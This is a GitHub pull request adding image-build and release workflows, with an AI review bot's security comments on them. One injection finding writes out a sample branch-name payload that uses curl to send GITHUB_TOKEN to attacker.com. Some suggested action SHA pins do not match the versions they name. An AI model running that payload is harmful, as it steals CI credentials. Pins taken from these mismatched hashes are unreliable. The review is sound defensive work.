Conversation
- odh-release.yaml: create release branch, tag, releasenotes - odh-build-image.yaml: build image for PR, build image and push to quay.io when PR merge to main Signed-off-by: Wen Zhou <wenzhou@redhat.com>
📝 WalkthroughWalkthroughTwo GitHub Actions workflows are introduced. The first builds and pushes container images to Quay.io registry conditionally on push events to the Estimated code review effort🎯 3 (Moderate) | ⏱️ ~20 minutes Security considerationsodh-release.yaml — Command injection via workflow_dispatch inputs (CWE-78) The
Actionable: Validate odh-build-image.yaml — Credential exposure via registry login The workflow logs in to Quay.io only on
Actionable: Confirm Docker credentials are not persisted in the job context after the build step completes. 🚥 Pre-merge checks | ✅ 1 | ❌ 1❌ Failed checks (1 inconclusive)
✅ Passed checks (1 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. Comment |
![coderabbitai[bot]](https://avatars.githubusercontent.com/in/347564?s=60&v=4){kind=small}
There was a problem hiding this comment.
Actionable comments posted: 5
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/odh-build-image.yaml:
- Around line 42-44: The job "build-and-push" lacks an explicit job-level
permissions block; add a minimal permissions section under the build-and-push
job to enforce least-privilege (e.g., set contents: read, packages: write,
id-token: write if using OIDC, actions: read) instead of relying on default
token permissions; place the permissions mapping directly under the
build-and-push job definition so CI steps that push images (packages) and read
repo contents have only the required scopes.
- Around line 45-46: Replace mutable tag refs like actions/checkout@v6,
docker/setup-buildx-action@v3, docker/login-action@v3 and
docker/build-push-action@v6 with their corresponding full commit SHA pins; find
each action repo (e.g., actions/checkout, docker/setup-buildx-action,
docker/login-action, docker/build-push-action), open the tag (v4/v3/v6 as used)
on GitHub and copy the full commit SHA for that tag, then update the workflow
entries (the uses: lines) to use the full SHA instead of the `@tag`, and apply the
same change to the other occurrences noted (lines referenced around the other
uses entries).
- Around line 70-78: The workflow step "Build and push image" must pass
APP_BUILD_ROOT into the build as a build-arg and drop the unused VERSION arg:
update the docker/build-push-action@v6 step (the "Build and push image" step) to
include build-args with APP_BUILD_ROOT set from the workflow env (e.g.
APP_BUILD_ROOT: ${{ env.APP_BUILD_ROOT }}) so WORKDIR and COPY in the Dockerfile
resolve correctly, and remove VERSION from build-args since the Dockerfile never
uses it. Ensure other settings (tags, push, platforms, cache-from/cache-to)
remain unchanged.
In @.github/workflows/odh-release.yaml:
- Around line 38-44: The run block is vulnerable to script injection because
inputs.release_branch and inputs.source_ref are interpolated directly into the
shell; change to pass these values via environment variables (e.g., map
inputs.release_branch -> BRANCH and inputs.source_ref -> SOURCE_REF using the
workflow's env: or job step env:) and reference $BRANCH/$SOURCE_REF inside the
run script (keep them fully quoted) rather than embedding the ${ { inputs.... }
} expressions inline; apply the same fix to the other run blocks that use
inputs.release_branch/source_ref and ensure you do not use eval or unquoted
expansions so the existing branch-validation regex against BRANCH remains safe.
- Around line 46-47: Replace unpinned action tags with their full commit SHAs:
for each occurrence of actions/checkout@v6, softprops/action-gh-release@v2 (and
the third unpinned action instance referenced in the review), update the uses:
entry to the corresponding full SHA for the specific release you intend to use
(e.g., the v6 release commit SHA for actions/checkout and the v2.6.1 commit SHA
for softprops/action-gh-release); verify the SHAs against the official GitHub
release tags before committing to ensure the pinned SHAs match the intended
versions.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Central YAML (base), Organization UI (inherited)
Review profile: CHILL
Plan: Pro
Run ID: ae99c458-b7c7-491e-85e8-f14b149c71de
📒 Files selected for processing (2)
.github/workflows/odh-build-image.yaml.github/workflows/odh-release.yaml
| build-and-push: | ||
| runs-on: ubuntu-latest | ||
| steps: |
There was a problem hiding this comment.
Missing job-level permissions violates least-privilege (CWE-250).
No permissions block defined. Default token permissions are overly broad. Add explicit minimal permissions:
jobs:
build-and-push:
runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ packages: write
steps:As per coding guidelines: "Set least-privilege permissions per job, not workflow level".
📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| build-and-push: | |
| runs-on: ubuntu-latest | |
| steps: | |
| build-and-push: | |
| runs-on: ubuntu-latest | |
| permissions: | |
| contents: read | |
| packages: write | |
| steps: |
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/odh-build-image.yaml around lines 42 - 44, The job
"build-and-push" lacks an explicit job-level permissions block; add a minimal
permissions section under the build-and-push job to enforce least-privilege
(e.g., set contents: read, packages: write, id-token: write if using OIDC,
actions: read) instead of relying on default token permissions; place the
permissions mapping directly under the build-and-push job definition so CI steps
that push images (packages) and read repo contents have only the required
scopes.
| - name: Checkout source | ||
| uses: actions/checkout@v6 |
There was a problem hiding this comment.
Pin all actions by full SHA to prevent supply chain attacks (CWE-1357).
Tag references (@v3, @v6) are mutable. An attacker who compromises the upstream repo can push malicious code under the same tag.
Proposed fix with SHA pinning
steps:
- name: Checkout source
- uses: actions/checkout@v6
+ uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
- name: Set up Docker Buildx
- uses: docker/setup-buildx-action@v3
+ uses: docker/setup-buildx-action@b5ca514318bd6ebac0fb2aedd5d36ec1b5c232a2 # v3.10.0
- name: Login to Quay.io
if: github.event_name == 'push'
- uses: docker/login-action@v3
+ uses: docker/login-action@74a5d142397b4f367a81961eba4e8cd7edddf772 # v3.4.0
with:
registry: ${{ env.REGISTRY }}
username: ${{ secrets.QUAY_ID }}
password: ${{ secrets.QUAY_TOKEN }}
- name: Build and push image
- uses: docker/build-push-action@v6
+ uses: docker/build-push-action@263435318d21b8e681c14492fe198f0a0c3f86e7 # v6.18.0As per coding guidelines: "Pin all actions by full SHA, not tags (prevent supply chain attacks)".
What are the latest SHA commits for actions/checkout v4, docker/setup-buildx-action v3, docker/login-action v3, and docker/build-push-action v6?
Also applies to: 59-60, 62-64, 70-71
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/odh-build-image.yaml around lines 45 - 46, Replace mutable
tag refs like actions/checkout@v6, docker/setup-buildx-action@v3,
docker/login-action@v3 and docker/build-push-action@v6 with their corresponding
full commit SHA pins; find each action repo (e.g., actions/checkout,
docker/setup-buildx-action, docker/login-action, docker/build-push-action), open
the tag (v4/v3/v6 as used) on GitHub and copy the full commit SHA for that tag,
then update the workflow entries (the uses: lines) to use the full SHA instead
of the `@tag`, and apply the same change to the other occurrences noted (lines
referenced around the other uses entries).
| - name: Build and push image | ||
| uses: docker/build-push-action@v6 | ||
| with: | ||
| context: . | ||
| push: ${{ github.event_name == 'push' }} | ||
| tags: ${{ env.REGISTRY }}/${{ env.REGISTRY_ORG }}/${{ env.IMAGE_NAME }}:${{ steps.tag.outputs.tag }} | ||
| platforms: linux/amd64 | ||
| cache-from: type=gha | ||
| cache-to: type=gha,mode=max |
There was a problem hiding this comment.
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash
# Verify Dockerfile ARG declarations and their usage
echo "=== ARG declarations ==="
rg -n '^ARG ' Dockerfile
echo -e "\n=== Usage of APP_BUILD_ROOT ==="
rg -n 'APP_BUILD_ROOT' Dockerfile
echo -e "\n=== Usage of VERSION ==="
rg -n 'VERSION' DockerfileRepository: opendatahub-io/workload-variant-autoscaler
Length of output: 399
🏁 Script executed:
#!/bin/bash
# Get the full Dockerfile content to understand ARG defaults and usage context
echo "=== Full Dockerfile content ==="
cat DockerfileRepository: opendatahub-io/workload-variant-autoscaler
Length of output: 993
APP_BUILD_ROOT must be provided as a build argument; VERSION is unused in the Dockerfile.
The issue with APP_BUILD_ROOT is valid—it's declared without a default at line 5 and used in both WORKDIR (line 12) and COPY (line 28). Without providing this as a build-arg, the paths resolve to empty strings, producing a malformed image.
However, VERSION (line 24) is declared but never used in the Dockerfile. Including it in the build-args is unnecessary.
Proposed fix
- name: Build and push image
uses: docker/build-push-action@v6
with:
context: .
push: ${{ github.event_name == 'push' }}
tags: ${{ env.REGISTRY }}/${{ env.REGISTRY_ORG }}/${{ env.IMAGE_NAME }}:${{ steps.tag.outputs.tag }}
platforms: linux/amd64
+ build-args: |
+ APP_BUILD_ROOT=/app
cache-from: type=gha
cache-to: type=gha,mode=max📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| - name: Build and push image | |
| uses: docker/build-push-action@v6 | |
| with: | |
| context: . | |
| push: ${{ github.event_name == 'push' }} | |
| tags: ${{ env.REGISTRY }}/${{ env.REGISTRY_ORG }}/${{ env.IMAGE_NAME }}:${{ steps.tag.outputs.tag }} | |
| platforms: linux/amd64 | |
| cache-from: type=gha | |
| cache-to: type=gha,mode=max | |
| - name: Build and push image | |
| uses: docker/build-push-action@v6 | |
| with: | |
| context: . | |
| push: ${{ github.event_name == 'push' }} | |
| tags: ${{ env.REGISTRY }}/${{ env.REGISTRY_ORG }}/${{ env.IMAGE_NAME }}:${{ steps.tag.outputs.tag }} | |
| platforms: linux/amd64 | |
| build-args: | | |
| APP_BUILD_ROOT=/app | |
| cache-from: type=gha | |
| cache-to: type=gha,mode=max |
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/odh-build-image.yaml around lines 70 - 78, The workflow
step "Build and push image" must pass APP_BUILD_ROOT into the build as a
build-arg and drop the unused VERSION arg: update the
docker/build-push-action@v6 step (the "Build and push image" step) to include
build-args with APP_BUILD_ROOT set from the workflow env (e.g. APP_BUILD_ROOT:
${{ env.APP_BUILD_ROOT }}) so WORKDIR and COPY in the Dockerfile resolve
correctly, and remove VERSION from build-args since the Dockerfile never uses
it. Ensure other settings (tags, push, platforms, cache-from/cache-to) remain
unchanged.
| run: | | ||
| BRANCH="${{ inputs.release_branch }}" | ||
| if [[ ! "$BRANCH" =~ ^release-v[0-9]+\.[0-9]+\.[0-9]+(-.+)?$ ]]; then | ||
| echo "::error::Invalid branch name '${BRANCH}'. Must match pattern 'release-v<major>.<minor>.<patch>[-<prerelease>]' (e.g. release-v3.5.0, release-v3.4.0-ea1)" | ||
| exit 1 | ||
| fi | ||
| echo "Branch name '${BRANCH}' is valid." |
There was a problem hiding this comment.
Script injection via unsanitized workflow inputs (CWE-94).
${{ inputs.release_branch }} and ${{ inputs.source_ref }} are interpolated directly into shell scripts. A user with workflow_dispatch permission can inject arbitrary shell commands via crafted input like release-v1.0.0"; curl attacker.com/exfil?token=$GITHUB_TOKEN #.
Pass inputs via environment variables instead:
Proposed fix for all affected run blocks
- name: Validate branch name
+ env:
+ BRANCH: ${{ inputs.release_branch }}
run: |
- BRANCH="${{ inputs.release_branch }}"
if [[ ! "$BRANCH" =~ ^release-v[0-9]+\.[0-9]+\.[0-9]+(-.+)?$ ]]; then
echo "::error::Invalid branch name '${BRANCH}'. Must match pattern 'release-v<major>.<minor>.<patch>[-<prerelease>]' (e.g. release-v3.5.0, release-v3.4.0-ea1)"
exit 1
fi
echo "Branch name '${BRANCH}' is valid."
- name: Create release branch
+ env:
+ BRANCH: ${{ inputs.release_branch }}
+ SOURCE_REF: ${{ inputs.source_ref }}
run: |
- BRANCH="${{ inputs.release_branch }}"
- SOURCE_REF="${{ inputs.source_ref }}"
if [[ -n "${SOURCE_REF}" ]]; then
echo "Creating release branch from SHA: ${SOURCE_REF}"
git checkout "${SOURCE_REF}"
else
echo "Creating release branch from latest ${{ env.DEFAULT_BRANCH }}"
fi
git checkout -b "${BRANCH}"
git push origin "${BRANCH}"
echo "::notice::Created release branch '${BRANCH}' from ${SOURCE_REF:-${{ env.DEFAULT_BRANCH }}}"
- name: Derive tag and push
id: derive-tag
+ env:
+ BRANCH: ${{ inputs.release_branch }}
run: |
- BRANCH="${{ inputs.release_branch }}"
TAG="${BRANCH#release-}"
echo "Tagging release branch '${BRANCH}' as '${TAG}'"
echo "tag=${TAG}" >> "$GITHUB_OUTPUT"
git tag "${TAG}"
git push origin "${TAG}"
echo "::notice::Created and pushed tag '${TAG}'"As per coding guidelines: "Never interpolate event data directly in run: blocks (script injection CWE-94)".
Also applies to: 52-64, 79-89
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/odh-release.yaml around lines 38 - 44, The run block is
vulnerable to script injection because inputs.release_branch and
inputs.source_ref are interpolated directly into the shell; change to pass these
values via environment variables (e.g., map inputs.release_branch -> BRANCH and
inputs.source_ref -> SOURCE_REF using the workflow's env: or job step env:) and
reference $BRANCH/$SOURCE_REF inside the run script (keep them fully quoted)
rather than embedding the ${ { inputs.... } } expressions inline; apply the same
fix to the other run blocks that use inputs.release_branch/source_ref and ensure
you do not use eval or unquoted expansions so the existing branch-validation
regex against BRANCH remains safe.
| - name: Checkout ${{ env.DEFAULT_BRANCH }} | ||
| uses: actions/checkout@v6 |
There was a problem hiding this comment.
🧩 Analysis chain
🌐 Web query:
What is the latest SHA commit for softprops/action-gh-release v2?
💡 Result:
The latest release for softprops/action-gh-release v2 is v2.6.1, released on March 16, 2026. The latest commit SHA for the v2.5.2 tag (visible in search results) is b25b93d. Full SHAs for newer tags like v2.6.1 are not explicitly found in the search snippets, but v2.6.1 is confirmed as the latest via GitHub repo page and newreleases.io. For the absolute latest commit on the default branch (likely master), it is the most recent of 479 commits as per repo page, but specific SHA not extracted.
Citations:
- 1: https://newreleases.io/project/github/softprops/action-gh-release/release/v2.6.0
- 2: https://github.com/softprops/action-gh-release
- 3: https://github.com/softprops/action-gh-release/releases
- 4: https://newreleases.io/project/github/softprops/action-gh-release/release/v2.6.1
🏁 Script executed:
# First, check the actual workflow file
cat -n .github/workflows/odh-release.yaml | head -110Repository: opendatahub-io/workload-variant-autoscaler
Length of output: 4388
🏁 Script executed:
# Get the latest official SHAs for actions/checkout v6 and softprops/action-gh-release
# Search GitHub Actions documentation or releases
curl -s https://api.github.com/repos/actions/checkout/releases/tags/v6 | jq '.target_commitish, .assets[] | select(.name | contains("")) | .name' 2>/dev/null || echo "API lookup"Repository: opendatahub-io/workload-variant-autoscaler
Length of output: 96
🏁 Script executed:
# Search for all uses of actions in the workflow file
rg "uses:" .github/workflows/odh-release.yaml -A 0Repository: opendatahub-io/workload-variant-autoscaler
Length of output: 198
🏁 Script executed:
# Get the correct SHA for actions/checkout v6
# Check GitHub API for v6 release
python3 << 'EOF'
import json
import subprocess
# Try to get checkout v6 SHA
try:
result = subprocess.run(
['curl', '-s', 'https://api.github.com/repos/actions/checkout/releases/tags/v6'],
capture_output=True, text=True
)
data = json.loads(result.stdout)
if 'tag_commitish' in data:
print(f"actions/checkout@v6 SHA: {data['tag_commitish']}")
if 'body' in data:
print("Release info available")
except Exception as e:
print(f"Error: {e}")
# For softprops action-gh-release
try:
result = subprocess.run(
['curl', '-s', 'https://api.github.com/repos/softprops/action-gh-release/releases/tags/v2'],
capture_output=True, text=True, timeout=5
)
data = json.loads(result.stdout)
if 'message' in data and 'Not Found' in data['message']:
print("v2 tag is a rolling tag, trying v2.6.1")
result = subprocess.run(
['curl', '-s', 'https://api.github.com/repos/softprops/action-gh-release/releases/tags/v2.6.1'],
capture_output=True, text=True, timeout=5
)
data = json.loads(result.stdout)
if 'tag_commitish' in data:
print(f"softprops/action-gh-release latest SHA: {data['tag_commitish']}")
except Exception as e:
print(f"Error: {e}")
EOFRepository: opendatahub-io/workload-variant-autoscaler
Length of output: 68
🌐 Web query:
What is the exact commit SHA for actions/checkout version 6?
💡 Result:
The exact commit SHA for actions/checkout version 6 (v6.0.0) is 1af3b93b68..., corresponding to the commit "update readme/changelog for v6 (#2311)" dated 2025-11-20. This is the top commit on the v6.0.0 tag as shown in the mirror repository commit graph at https://git.velechovsky.com/actions/checkout/commits/tag/v6.0.0/README.md. Official GitHub sources confirm v6.0.0 exists as the initial v6 release (CHANGELOG.md and releases page), and tags point to specific commits. For the full SHA, visit the tag on GitHub: https://github.com/actions/checkout/releases/tag/v6.0.0 and note the commit SHA displayed there. Pinning to SHA is recommended for security as per GitHub best practices.
Citations:
- 1: https://git.velechovsky.com/actions/checkout/commits/tag/v6.0.0/README.md
- 2: https://github.com/actions/checkout/blob/main/CHANGELOG.md
- 3: https://github.com/actions/checkout
- 4: https://github.com/actions/checkout/releases
- 5: https://newreleases.io/project/github/actions/checkout/release/v6.0.0
🌐 Web query:
What is the exact commit SHA for softprops/action-gh-release version 2?
💡 Result:
There is no exact commit SHA for "softprops/action-gh-release version 2" because "v2" refers to the major version branch or reference used in GitHub Actions workflows (uses: softprops/action-gh-release@v2), which resolves to the latest release tag with a v2.x.x version (currently v2.6.1 as of March 2026). GitHub Actions pins to the commit SHA of the specific tag at resolution time, but "version 2" itself is not a specific tagged release with a single SHA. Specific releases like v2.5.2 point to commit b25b93d (short SHA). For v1, examples like de2c0eb89ae2a093876385947365aca7b0e5f844 exist in usage examples.
Citations:
- 1: https://github.com/softprops/action-gh-release/releases
- 2: https://github.com/softprops/action-gh-release
- 3: https://newreleases.io/project/github/softprops/action-gh-release/release/v2.6.0
- 4: https://newreleases.io/project/github/softprops/action-gh-release/release/v2.5.2
- 5: chore(deps): bump softprops/action-gh-release from 2.0.5 to 2.0.6 argoproj/argo-rollouts#3656
Pin actions by full SHA (CWE-1357).
Supply chain attack risk on unpinned action versions. Applies to all three instances (lines 46–47, 73–74, 100–101).
actions/checkout@v6→ pin to full SHA for v6 releasesoftprops/action-gh-release@v2→ pin to full SHA for v2.6.1 (latest v2.x)
The proposed fix SHAs are mismatched to the versions in use; verify correct SHAs from official GitHub releases before applying.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/odh-release.yaml around lines 46 - 47, Replace unpinned
action tags with their full commit SHAs: for each occurrence of
actions/checkout@v6, softprops/action-gh-release@v2 (and the third unpinned
action instance referenced in the review), update the uses: entry to the
corresponding full SHA for the specific release you intend to use (e.g., the v6
release commit SHA for actions/checkout and the v2.6.1 commit SHA for
softprops/action-gh-release); verify the SHAs against the official GitHub
release tags before committing to ensure the pinned SHAs match the intended
versions.
|
close this in favor or opendatahub-io/odh-model-controller#774 for release |
1 participant
ref https://redhat.atlassian.net/browse/INFERENG-5594
Description
How Has This Been Tested?
Merge criteria:
Summary by CodeRabbit